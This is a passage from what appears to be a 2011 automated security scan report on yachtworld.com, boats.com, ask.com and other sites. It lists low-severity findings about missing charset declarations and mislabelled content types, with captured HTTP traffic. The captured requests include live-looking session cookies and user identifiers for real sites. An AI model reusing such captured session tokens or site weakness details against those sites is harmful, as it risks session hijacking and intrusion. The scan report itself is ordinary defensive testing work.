s.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:43 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...

16.17. https://www.yachtworld.com/core/listing/cache/searchResults.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Request

Response

16.18. https://www.yachtworld.com/core/personalboatshopper/pbs.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/personalboatshopper/pbs.jsp

Request

GET /core/personalboatshopper/pbs.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:59 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.19. https://www.yachtworld.com/core/services/services.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/services/services.jsp

Request

GET /core/services/services.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:58:05 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.20. https://www.yachtworld.com/globalnav/sitemap.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/globalnav/sitemap.html.en

Request

GET /globalnav/sitemap.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:59:05 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 32654
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...

16.21. https://www.yachtworld.com/leaving_yw.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/leaving_yw.cgi

Request

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:48:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=" NAME="back" noscroll>
<FRAME SRC="" NAME="cust_url">
</FRAMESET>

<NOFRAME>
<BODY BGCOLOR="#FF
...[SNIP]...

17. HTML does not specify charset previous next
There are 7 instances of this issue:

http://ads.pointroll.com/PortalServe/
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://www.boats.com/includes/script_declarations.jsp
http://wzus1.ask.com/i/b.html
http://wzus1.ask.com/i/i.gif
http://wzus1.ask.com/r

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

17.1. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

Response

17.2. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.3. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.4. http://www.boats.com/includes/script_declarations.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boats.com
Path:	/includes/script_declarations.jsp

Request

Response

17.5. http://wzus1.ask.com/i/b.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/i/b.html

Request

GET /i/b.html HTTP/1.1
Host: wzus1.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tbe=1; accepting=1; wz_scnt=1; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; cu.wz=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:14:50 GMT
Pragma: no-cache
Expires: Tue, 31 Dec 1996 23:59:59 GMT
Cache-Control: no-cache
Whatzup: 5.1.0/5.1.0-10
Content-Length: 230
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>error</title>
</head>
<body>
<font color="red">Error:</font> Missing
...[SNIP]...

17.6. http://wzus1.ask.com/i/i.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/i/i.gif

Request

GET /i/i.gif HTTP/1.1
Host: wzus1.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tbe=1; accepting=1; wz_scnt=1; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; cu.wz=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:14:49 GMT
Pragma: no-cache
Expires: Tue, 31 Dec 1996 23:59:59 GMT
Cache-Control: no-cache
Whatzup: 5.1.0/5.1.0-10
Content-Length: 230
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>error</title>
</head>
<body>
<font color="red">Error:</font> Missing
...[SNIP]...

17.7. http://wzus1.ask.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/r

Request

GET /r HTTP/1.1
Host: wzus1.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tbe=1; accepting=1; wz_scnt=1; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; cu.wz=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.1.10.1296155592; user=o=0&l=dir;

Response

18. Content type incorrectly stated previous next
There are 6 instances of this issue:

http://ss.ask.com/favicon.ico
http://ss.ask.com/query
http://www.boats.com/includes/script_declarations.jsp
http://www.yachtworld.com/clarkslanding/images/e323276.jpg
http://www.yachtworld.com/clarkslanding/images/e86210.jpg
http://www.yachtworld.com/core/recentlyviewedboatsSRP

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

18.1. http://ss.ask.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ss.ask.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; cu.wz=0; user=o=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMwOjUxLVVUQw%3D%3D&po=0&pp=dir; ldpt=porg=5488|0~5489|0~5490|0

Response

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:35:04 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 16
Content-Type: text/html; charset=iso-8859-1

Invalid request.

18.2. http://ss.ask.com/query previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ss.ask.com
Path:	/query

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /query?sstype=prefix&fn=searchSuggestion&q=re&limit=8&timestamp=1296155610067 HTTP/1.1
Host: ss.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
